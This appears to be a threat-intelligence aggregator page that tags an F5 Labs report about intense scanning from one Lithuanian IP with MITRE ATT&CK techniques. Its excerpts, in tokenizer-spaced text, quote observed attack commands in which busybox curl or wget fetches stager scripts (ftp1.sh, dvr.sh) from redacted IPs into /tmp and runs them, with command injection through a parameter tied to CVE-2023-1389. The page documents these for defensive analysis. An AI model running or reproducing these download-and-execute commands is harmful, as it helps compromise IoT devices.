TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

Continued Intense Scanning From One IP in Lithuania

2024-10-21 · Read original ↗

ATT&CK techniques detected

5 predictions
T1059.004Unix Shell
99%
“##p1. sh - o / tmp / ftp1. sh & & / bin / busybox chmod + x / tmp / ftp1. sh & & / tmp / ftp1. sh ; attempts to use the busybox binary to run wget to fetch a file called ftp1. sh and save that to the file / tmp / ftp1. sh on the target machine use the busybox binary to run the ch…”
T1059.004Unix Shell
99%
“sh - g 103. 1 this was clearly an attempt to exploit cve - 2023 - 1389, our top scanned for cve in september. one can also easily see that this is a command injection vulnerability in the “ country ” parameter. the specifics are representative of what we see in command injection …”
T1059.004Unix Shell
92%
“ftp1. sh ; / bin / busybox curl http : / / xxx. xxx. xxx. xxx / dvr. sh - o / tmp / dvr. sh & & / bin / busybox chmod + x / tmp / dvr. sh & & / tmp / dvr. sh ; / bin / busybox curl http : / / xxx. xxx. xxx. xxx / ftp1. sh - o / tmp / ftp1. sh & & / bin / busybox chmod + x / tmp /…”
T1048.003Exfiltration Over Unencrypted Non-C2 Protocol
91%
“##x. xxx / ftp1. sh - o / tmp / ftp1. sh & & chmod + x / tmp / ftp1. sh & & / tmp / ftp1. sh ; curl http : / / xxx. xxx. xxx. xxx / dvr. sh - o / tmp / dvr. sh & & chmod + x / tmp / dvr. sh & & / tmp / dvr. sh ; curl http : / / xxx. xxx. xxx. xxx / ftp1. sh - o / tmp / ftp1. sh &…”
T1071.001Web Protocols
86%
“the very least show that some cves are attempted to be used, and moreover, attempt to download malware stagers, because this data is included in the traffic they send. for example, the most common url of this type observed in september, after url decoding, was this ( with ip addr…”

Summary

Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.